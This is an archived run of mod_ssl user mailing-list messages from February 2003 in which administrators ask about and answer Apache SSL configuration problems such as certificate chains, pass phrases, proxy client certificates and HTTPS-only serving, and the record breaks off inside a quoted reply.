Delivered-To: modssl-users@modssl.org
Received: by master.modssl.org (Postfix, from userid 4000)
	id 955F82AA03B; Sun, 23 Feb 2003 12:49:39 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Received: from hotmail.com (f154.law8.hotmail.com [216.33.241.154])
	by master.modssl.org (Postfix) with ESMTP id 303A82AA019
	for ; Thu, 20 Feb 2003 18:42:38 +0100 (CET)
Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC;
	 Thu, 20 Feb 2003 09:31:15 -0800
Received: from 66.47.62.120 by lw8fd.law8.hotmail.msn.com with HTTP;
	Thu, 20 Feb 2003 17:31:15 GMT
X-Originating-IP: [66.47.62.120]
From: "BJ Walsh" 
To: modssl-users@modssl.org
Subject: Certificate chain weirdness!
Date: Thu, 20 Feb 2003 17:31:15 +0000
Mime-Version: 1.0
Content-Type: text/plain; format=flowed
Message-ID: 
X-OriginalArrivalTime: 20 Feb 2003 17:31:15.0976 (UTC) FILETIME=[DF08E080:01C2D905]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "BJ Walsh" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I'm using Apache 2.0.44 with mod_ssl, and OpenSSL 0.9.7. I have a site 
configured with 3 virtual hosts (each with its own IP address) all listening 
on port 443. Each virtual host has it's own certificate (issued by GTE via 
an intermediate CA). I have two CA certs (from GTE and the intermediate) 
properly concatenated into a single file, and I'm using 
SSLCertificateChainFile to point to this file.

Here's where the weirdness starts...

If I comment out two of the virtual hosts, the single virtual host loads 
fine.

If I try to load two or more virtual hosts (remember, these are all 
different IP addresses and domain names) I get the dreaded "Failed to 
configure CA certificate chain" error.

However, I add a dummy virtual host without the SSLCertificateChainFile 
directive (or remove it from one of the existing virtual hosts) it will run. 
I get a certificate warning in the browser for the host without the 
SSLCertificateChainFile, but it still runs.

I also tried movng the SSLCertificateChainFile directive outside the vhost 
blocks - to no avail.

Any help would be greatly appreciated.





_________________________________________________________________
Tired of spam? Get advanced junk mail protection with MSN 8. 
http://join.msn.com/?page=features/junkmail
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Feb 23 12:51:06 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 0F6542AA036; Sun, 23 Feb 2003 12:51:06 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: by master.modssl.org (Postfix, from userid 4000)
	id A47392AA026; Sun, 23 Feb 2003 12:51:05 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Received: from apollo.email.starband.net (smtp2.starband.net [148.78.247.23])
	by master.modssl.org (Postfix) with ESMTP id 70A362AA01F
	for ; Fri, 21 Feb 2003 00:20:06 +0100 (CET)
Received: from 148.64.7.192 (vsat-148-64-7-192.c050.t7.mrt.starband.net [148.64.7.192])
	by apollo.email.starband.net (8.12.4/8.12.4) with ESMTP id h1KNJvH5011186
	for ; Thu, 20 Feb 2003 18:19:59 -0500
Date: Thu, 20 Feb 2003 15:19:19 -0800
From: rdkurth@starband.net
X-Mailer: The Bat! (v1.62 Christmas Edition) Personal
X-Priority: 3 (Normal)
Message-ID: <192263792273.20030220151919@starband.net>
To: modssl-users@modssl.org
Subject: Apache will not start HELP
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: rdkurth@starband.net
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I get the error message every time I try to start Apache and it will
not start. I need help with this. What do I need to be looking at to
fix this

[Thu Feb 20 18:00:09 2003] [error] mod_ssl: Init: Failed to load temporary 512 bit RSA private key

  

-- 
Best regards,
 rdkurth                          mailto:rdkurth@starband.net
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Feb 23 12:51:18 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id B47122AA023; Sun, 23 Feb 2003 12:51:18 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: by master.modssl.org (Postfix, from userid 4000)
	id 6026E2AA03B; Sun, 23 Feb 2003 12:51:18 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Received: from LNSDMZ01.dsv-gruppe.de (mail.deutscher-sparkassenverlag.de [194.55.112.64])
	by master.modssl.org (Postfix) with ESMTP id 53D1F2AA015
	for ; Fri, 21 Feb 2003 07:46:56 +0100 (CET)
Sensitivity: 
Subject: Howto use SSLProxyMachineCertificatePath Directive
To: modssl-users@modssl.org
X-Mailer: Lotus Notes Release 5.07a  May 14, 2001
Message-ID: 
From: ulrich.lohrmann@dsv-gruppe.de
Date: Fri, 21 Feb 2003 07:44:18 +0100
X-MIMETrack: Serialize by Router on LNSDMZ01/DSVextern/DE(Release 5.0.11 |July 24, 2002) at
 21.02.2003 07:35:55
MIME-Version: 1.0
Content-type: text/plain; charset=iso-8859-1
Content-transfer-encoding: quoted-printable
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: ulrich.lohrmann@dsv-gruppe.de
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi all,

the documentation for the directive SSLProxyMachineCertificatePath
outlines, that
this is the path of the directory where the certificates are kept, that=
 are
used
for authentication of the proxy server to the backend server.

My questions:
1.) How does mod_ssl select a certificated stored in this directory?
2.) If this directory contains several certificates, which one is taken=
?

Any help and comments appreciated.

Best regards
Ulrich
_______________________________________________________________________=
_____

Deutscher Sparkassen Verlag GmbH

Am Wallgraben 115
70565 Stuttgart
Telefon: 0711/782-0
Webseite: http://www.dsv-gruppe.de
_______________________________________________________________________=
_____

Dieses E-Mail einschlie=DFlich evtl. angeh=E4ngter Dateien enth=E4lt ve=
rtrauliche
und/oder rechtlich gesch=FCtzte Informationen. Wenn Sie nicht der richt=
ige
Adressat sind und Sie dieses E-Mail irrt=FCmlich erhalten haben, d=FCrf=
en Sie
weder den Inhalt dieses E-Mails nutzen noch d=FCrfen Sie die evtl.
angeh=E4ngten Dateien =F6ffnen und auch nichts kopieren oder
weitergeben/verbreiten.
Bitte verst=E4ndigen Sie den Absender und l=F6schen Sie dieses E-Mail u=
nd evtl.
angeh=E4ngte Dateien umgehend. Vielen Dank!
_______________________________________________________________________=
_____
=

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Feb 23 12:51:23 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 27EF02AA03D; Sun, 23 Feb 2003 12:51:23 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: by master.modssl.org (Postfix, from userid 4000)
	id CD20E2AA036; Sun, 23 Feb 2003 12:51:22 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Received: from LNSDMZ01.dsv-gruppe.de (mail.deutscher-sparkassenverlag.de [194.55.112.64])
	by master.modssl.org (Postfix) with ESMTP id 2FC6A2AA015
	for ; Fri, 21 Feb 2003 07:41:46 +0100 (CET)
Sensitivity: 
Subject: SSLProxy - Howto delegate Client Certificate to backend server
To: modssl-users@modssl.org
X-Mailer: Lotus Notes Release 5.07a  May 14, 2001
Message-ID: 
From: ulrich.lohrmann@dsv-gruppe.de
Date: Fri, 21 Feb 2003 07:39:07 +0100
X-MIMETrack: Serialize by Router on LNSDMZ01/DSVextern/DE(Release 5.0.11 |July 24, 2002) at
 21.02.2003 07:30:45
MIME-Version: 1.0
Content-type: text/plain; charset=iso-8859-1
Content-transfer-encoding: quoted-printable
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: ulrich.lohrmann@dsv-gruppe.de
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi all,

I have the following scenario:

Apache webserver 2.0.44 with mod_ssl requires client authentication dur=
ing
SSL handshake
for a particular URL. All further requests coming in over the establish=
ed
SSL connection are
delegated to a backend server. The connection between the webserver and=
 the
backend
server is also configured to be a SSL connection with client
authentication, so the webserver
has to provide a client certificate to the backend server.

I'd like to pass the client certificate provided by the end user to the=

backend server. Is there a
chance to do this with mod_ssl?

Any help and comments appreciated.

Best regards
Ulrich
_______________________________________________________________________=
_____

Deutscher Sparkassen Verlag GmbH

Am Wallgraben 115
70565 Stuttgart
Telefon: 0711/782-0
Webseite: http://www.dsv-gruppe.de
_______________________________________________________________________=
_____

Dieses E-Mail einschlie=DFlich evtl. angeh=E4ngter Dateien enth=E4lt ve=
rtrauliche
und/oder rechtlich gesch=FCtzte Informationen. Wenn Sie nicht der richt=
ige
Adressat sind und Sie dieses E-Mail irrt=FCmlich erhalten haben, d=FCrf=
en Sie
weder den Inhalt dieses E-Mails nutzen noch d=FCrfen Sie die evtl.
angeh=E4ngten Dateien =F6ffnen und auch nichts kopieren oder
weitergeben/verbreiten.
Bitte verst=E4ndigen Sie den Absender und l=F6schen Sie dieses E-Mail u=
nd evtl.
angeh=E4ngte Dateien umgehend. Vielen Dank!
_______________________________________________________________________=
_____
=

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Feb 23 14:34:51 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 992BA2AA034; Sun, 23 Feb 2003 14:34:51 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from bistromath.cs.virginia.edu (va-chrvlle-cad1-bdgrp1-4e-103.chvlva.adelphia.net [24.51.105.103])
	by master.modssl.org (Postfix) with ESMTP id 9FD092AA026
	for ; Sun, 23 Feb 2003 14:34:49 +0100 (CET)
Received: from localhost (root@localhost)
	by bistromath.cs.virginia.edu (8.12.6/8.11.4) with ESMTP id h1NDXpZH000439;
	Sun, 23 Feb 2003 08:33:51 -0500
Date: Sun, 23 Feb 2003 08:33:50 -0500 (EST)
From: Cliff Woolley 
X-X-Sender: root@bistromath.cs.virginia.edu
To: Ron Rough 
Cc: modssl-users@modssl.org
Subject: Re: RSA WebAgent5.1 and Apache 1.3.26 not 1.3.27?
In-Reply-To: <5.0.0.25.2.20030218081709.01bf2828@plutarch.dfrc.nasa.gov>
Message-ID: 
References: <5.0.0.25.2.20030218081709.01bf2828@plutarch.dfrc.nasa.gov>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Tue, 18 Feb 2003, Ron Rough wrote:

> I would like fo get the technical reason for
> this. I know of someone who installed the
> WebAgent.tar file from your web site and
> it worked with the latest versions of
> Apache and mod_ssl.

WebAgent.tar would have been downloaded from
http://www.rsasecurity.com/go/apacheagent/, not from
http://www.modssl.org/.  If you're having a problem
with WebAgent, contact RSA, not the mod_ssl group.

--Cliff
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Feb 23 14:41:27 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 6300B2AA034; Sun, 23 Feb 2003 14:41:27 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from bistromath.cs.virginia.edu (va-chrvlle-cad1-bdgrp1-4e-103.chvlva.adelphia.net [24.51.105.103])
	by master.modssl.org (Postfix) with ESMTP id 14D7C2AA026
	for ; Sun, 23 Feb 2003 14:41:26 +0100 (CET)
Received: from localhost (root@localhost)
	by bistromath.cs.virginia.edu (8.12.6/8.11.4) with ESMTP id h1NDeT9J000442
	for ; Sun, 23 Feb 2003 08:40:29 -0500
Date: Sun, 23 Feb 2003 08:40:28 -0500 (EST)
From: Cliff Woolley 
X-X-Sender: root@bistromath.cs.virginia.edu
To: modssl-users@modssl.org
Subject: Re: SSL Pass Phrase
In-Reply-To: <27b801c2d8d1$9e962640$2f01a8c0@gemweb.net>
Message-ID: 
References: <27b801c2d8d1$9e962640$2f01a8c0@gemweb.net>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Thu, 20 Feb 2003, Glenn E. May wrote:

> I recently installed mod-ssl on a new web server. Unfortunately, in my
> haste to get the machine up and running, I cannot remember the pass
> phrase that I used. I have tried making a de-install, and re-installing,
> however I am unable to bypass this.

When you reinstall, it leaves your old private key/certificate in place
intentionally (it would suck to have them be overwritten! :).  If you want
to delete them and start over, you have to do it yourself.  Delete the
ssl.* subdirectories of your Apache conf directory and redo the entire
generate-private-key-then-get-certificate process from scratch.  Of course
you realize that if you already bought a real certificate from a CA to go
with your old private key that you're going to have to get a new one (and
different CA's have different reissue policies).

--Cliff
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Feb 23 15:41:38 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 5BF532AA036; Sun, 23 Feb 2003 15:41:38 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail1.rdcss.com (dsl-66-112-64-104.spt.customer.centurytel.net [66.112.64.104])
	by master.modssl.org (Postfix) with ESMTP id 1277E2AA023
	for ; Sun, 23 Feb 2003 15:41:34 +0100 (CET)
Received: from me (unknown [192.168.0.5])
	by mail1.rdcss.com (Postfix) with ESMTP id 8FEBC1B932
	for ; Sun, 23 Feb 2003 14:41:29 +0000 (UTC)
Message-ID: <00d901c2db49$3a239060$05000000@rdcss.com>
From: 
To: 
References: <3E581E60.10663.72DE8A@localhost> <3E58899E.9030101@sancho2k.net>
Subject: Re: Test msg - Is this list still alive?
Date: Sun, 23 Feb 2003 08:37:54 -0600
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: base64
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1106
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

dGhlcmUgd2FzIGEgZG9zIGF0dGFjayBvbiBzZXZlcmFsIGludGVybmV0IGJhY2tib25lcyB0aGF0
IHNodXQgdGhlbSBkb3duIEl0IG1heSBoYXZlIGFmZmVjdGVkIHlvdXIgaW50ZXJuZXQgY29ubmVj
dGl2aXR5LiBJdCBhZmZlY3RlZCBteSBuYW1lIHNlcnZlcnMgdGhhdCBJIHVzZSBhdCB6b25lZWRp
dC5jb20NCg0KdGhhbmtzDQpSb2JlcnQNCi0tLS0tIE9yaWdpbmFsIE1lc3NhZ2UgLS0tLS0gDQpG
cm9tOiAiU2FuY2hvMmsubmV0IExpc3RzIiA8bGlzdHNAc2FuY2hvMmsubmV0Pg0KVG86IDxtb2Rz
c2wtdXNlcnNAbW9kc3NsLm9yZz4NClNlbnQ6IFN1bmRheSwgRmVicnVhcnkgMjMsIDIwMDMgMjo0
MyBBTQ0KU3ViamVjdDogUmU6IFRlc3QgbXNnIC0gSXMgdGhpcyBsaXN0IHN0aWxsIGFsaXZlPw0K
DQoNCj4gamF5bW9AaGl3YWF5Lm5ldCB3cm90ZToNCj4gPiBUaGlzIGlzIGEgdGVzdCAtIHNvcnJ5
IGZvciBhbnkgaW5jb252ZW5pZW5jZSwgYnV0IG15IG1vZHNzbCBsaXN0IA0KPiA+IG1lc3NhZ2Vz
IGhhdmUgc3RvcHBlZC4NCj4gDQo+IG1pbmUgdG9vLiBxdWlldCB3ZWVrZW5kLg0KPiANCj4gX19f
X19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19f
X19fX19fX19fXw0KPiBBcGFjaGUgSW50ZXJmYWNlIHRvIE9wZW5TU0wgKG1vZF9zc2wpICAgICAg
ICAgICAgICAgICAgIHd3dy5tb2Rzc2wub3JnDQo+IFVzZXIgU3VwcG9ydCBNYWlsaW5nIExpc3Qg
ICAgICAgICAgICAgICAgICAgICAgbW9kc3NsLXVzZXJzQG1vZHNzbC5vcmcNCj4gQXV0b21hdGVk
IExpc3QgTWFuYWdlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBtYWpvcmRvbW9AbW9kc3Ns
Lm9yZw==


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Feb 23 17:01:58 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id CD63F2AA026; Sun, 23 Feb 2003 17:01:58 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from toftum.dk (toftum.dk [193.88.12.46])
	by master.modssl.org (Postfix) with ESMTP id 8FE5C2AA01F
	for ; Sun, 23 Feb 2003 17:01:57 +0100 (CET)
Received: by toftum.dk (Postfix, from userid 1001)
	id 6358C6E4051; Sun, 23 Feb 2003 17:01:45 +0100 (CET)
Date: Sun, 23 Feb 2003 17:01:45 +0100
From: Mads Toftum 
To: modssl-users@modssl.org
Subject: Re: mass ip virtual host & mod_ssl?
Message-ID: <20030223160145.GA4278@toftum.dk>
Mail-Followup-To: modssl-users@modssl.org
References: 
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: 
X-Mailer: mutt
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mads Toftum 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Tue, Feb 18, 2003 at 05:09:38PM -0600, Ray a PowerWeb Tech wrote:
> is it possible using either mod_rewrite, mod_vhosts_alias or some trick in 
> mod_ssl to have multiple virtual hosts by ip address
> 
No, that is not possible.

vh

Mads Toftum
-- 
`Darn it, who spiked my coffee with water?!' - lwall

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Feb 23 17:14:08 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 343442AA026; Sun, 23 Feb 2003 17:14:08 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from toftum.dk (toftum.dk [193.88.12.46])
	by master.modssl.org (Postfix) with ESMTP id 5A1342AA01F
	for ; Sun, 23 Feb 2003 17:14:07 +0100 (CET)
Received: by toftum.dk (Postfix, from userid 1001)
	id 69A616E4051; Sun, 23 Feb 2003 17:14:04 +0100 (CET)
Date: Sun, 23 Feb 2003 17:14:04 +0100
From: Mads Toftum 
To: modssl-users@modssl.org
Subject: Re: SSLProxy - Howto delegate Client Certificate to backend server
Message-ID: <20030223161404.GB4278@toftum.dk>
Mail-Followup-To: modssl-users@modssl.org
References: 
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: 
X-Mailer: mutt
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mads Toftum 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Fri, Feb 21, 2003 at 07:39:07AM +0100, ulrich.lohrmann@dsv-gruppe.de wrote:
> I'd like to pass the client certificate provided by the end user to the
> backend server. Is there a
> chance to do this with mod_ssl?
> 
Currently there isn't a solution with mod_ssl. There is however a couple
of ways to do this if you don't mind hacking the code. I made a POC module
for Apache 1.3 http://www.toftum.org/www2/apache/ which is just a very
simple example of how this can be done. There has also been sent a patch
to the dev@httpd list recently - they have not been included, but see 
http://marc.theaimsgroup.com/?t=104499235500006&r=1&w=2

vh

Mads Toftum
-- 
`Darn it, who spiked my coffee with water?!' - lwall

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Feb 23 17:15:27 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 21FCB2AA036; Sun, 23 Feb 2003 17:15:27 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from toftum.dk (toftum.dk [193.88.12.46])
	by master.modssl.org (Postfix) with ESMTP id A5D432AA015
	for ; Sun, 23 Feb 2003 17:15:26 +0100 (CET)
Received: by toftum.dk (Postfix, from userid 1001)
	id D5EE56E4051; Sun, 23 Feb 2003 17:15:23 +0100 (CET)
Date: Sun, 23 Feb 2003 17:15:23 +0100
From: Mads Toftum 
To: modssl-users@modssl.org
Subject: Re: Apache will not start HELP
Message-ID: <20030223161523.GC4278@toftum.dk>
Mail-Followup-To: modssl-users@modssl.org
References: <192263792273.20030220151919@starband.net>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <192263792273.20030220151919@starband.net>
X-Mailer: mutt
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mads Toftum 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Thu, Feb 20, 2003 at 03:19:19PM -0800, rdkurth@starband.net wrote:
> I get the error message every time I try to start Apache and it will
> not start. I need help with this. What do I need to be looking at to
> fix this
> 
> [Thu Feb 20 18:00:09 2003] [error] mod_ssl: Init: Failed to load temporary 512 bit RSA private key
> 
See the FAQ: http://www.modssl.org/docs/2.8/ssl_faq.html#entropy

vh

Mads Toftum
-- 
`Darn it, who spiked my coffee with water?!' - lwall

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Feb 24 00:57:10 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id C97D72AA039; Mon, 24 Feb 2003 00:57:10 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from imf52bis.bellsouth.net (mail140.mail.bellsouth.net [205.152.58.100])
	by master.modssl.org (Postfix) with ESMTP id 096882AA019
	for ; Mon, 24 Feb 2003 00:57:04 +0100 (CET)
Received: from jumbo ([67.33.58.194]) by imf52bis.bellsouth.net
          (InterMail vM.5.01.04.25 201-253-122-122-125-20020815) with ESMTP
          id <20030223235859.OJPH12722.imf52bis.bellsouth.net@jumbo>
          for ; Sun, 23 Feb 2003 18:58:59 -0500
From: "Jay Moore" 
To: modssl-users@modssl.org
Date: Sun, 23 Feb 2003 17:58:16 -0600
MIME-Version: 1.0
Content-type: text/plain; charset=US-ASCII
Content-transfer-encoding: 7BIT
Subject: How to run apache in https only ?
Message-ID: <3E590BB8.15805.412011A@localhost>
X-mailer: Pegasus Mail for Win32 (v3.12c)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Jay Moore" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I know this is a bit off-topic for this list, and I deserve all the 
flames I get... But I'm in a hurry, so here goes...

I want to run Apache so it responds only to https on port 443; http 
requests are to be simply ignored. I thought I knew how to do this, but 
then read something about using mod_rewrite which gave me a headache. 
Is there a simple how-to describing how to run your server so it 
responds only to https over port 443?

Thanks,
Jay
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Feb 24 00:59:04 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 5F4A22AA039; Mon, 24 Feb 2003 00:59:04 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from bistromath.cs.virginia.edu (va-chrvlle-cad1-bdgrp1-4e-103.chvlva.adelphia.net [24.51.105.103])
	by master.modssl.org (Postfix) with ESMTP id AD5222AA019
	for ; Mon, 24 Feb 2003 00:59:02 +0100 (CET)
Received: from localhost (root@localhost)
	by bistromath.cs.virginia.edu (8.12.6/8.11.4) with ESMTP id h1NNurlN000673
	for ; Sun, 23 Feb 2003 18:56:55 -0500
Date: Sun, 23 Feb 2003 18:56:52 -0500 (EST)
From: Cliff Woolley 
X-X-Sender: root@bistromath.cs.virginia.edu
To: modssl-users@modssl.org
Subject: Re: How to run apache in https only ?
In-Reply-To: <3E590BB8.15805.412011A@localhost>
Message-ID: 
References: <3E590BB8.15805.412011A@localhost>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Sun, 23 Feb 2003, Jay Moore wrote:

> I want to run Apache so it responds only to https on port 443; http
> requests are to be simply ignored. I thought I knew how to do this, but
> then read something about using mod_rewrite which gave me a headache.
> Is there a simple how-to describing how to run your server so it
> responds only to https over port 443?

Sure.  See the SSLRequireSSL directive.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Feb 24 01:19:21 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 2C60B2AA039; Mon, 24 Feb 2003 01:19:21 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from darkstar.sysinfo.com (darkstar.sysinfo.com [209.170.144.33])
	by master.modssl.org (Postfix) with ESMTP id 194C32AA019
	for ; Mon, 24 Feb 2003 01:19:18 +0100 (CET)
Received: from blackhole.sysinfo.com (dufresne@blackhole.sysinfo.com [209.170.142.145])
	by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id TAA28718
	for ; Sun, 23 Feb 2003 19:17:26 -0500
Date: Sun, 23 Feb 2003 19:17:25 -0500 (EST)
From: "R. DuFresne" 
To: modssl-users@modssl.org
Subject: Re: How to run apache in https only ?
In-Reply-To: <3E590BB8.15805.412011A@localhost>
Message-ID: 
Organization: sysinfo.com
X-Subliminal: If at first you don't suck seed...
X-Admonition: The Good thing about potential is
X-Admonition2: as long as you do nothing
X-Admonition3: you'll always have it.
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "R. DuFresne" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


there are a couple of areas to check to see if your settings are correct
for this;


...
# BindAddress: You can support virtual hosts with this option. This
directive
# is used to tell the server which IP address to listen to. It can either
# contain "*", an IP address, or a fully qualified Internet domain name.
# See also the  and Listen directives.
#
#BindAddress *
...
#
# Port: The port to which the standalone server listens. For
# ports < 1023, you will need httpd to be run as root initially.
#
Port 80
...

##  SSL Support
##
##  When we also provide SSL we have to listen to the
##  standard HTTP port (see above) and to the HTTPS port
##

Listen someplace.com:80
Listen someplace.com:443



port 80 references are http, port 443 references are https.  Edit these
settings as appropriate for your setup.  Providing those are properly set
and the cert properly generated and available as stated in the configs,
then your systems should listen at the proper address/interface on the
appropriate port there for connections/services.  I believe bindaddress
has been depriciated for the listen directive.

Thanks,

Ron DuFresne


On Sun, 23 Feb 2003, Jay Moore wrote:

> I know this is a bit off-topic for this list, and I deserve all the 
> flames I get... But I'm in a hurry, so here goes...
> 
> I want to run Apache so it responds only to https on port 443; http 
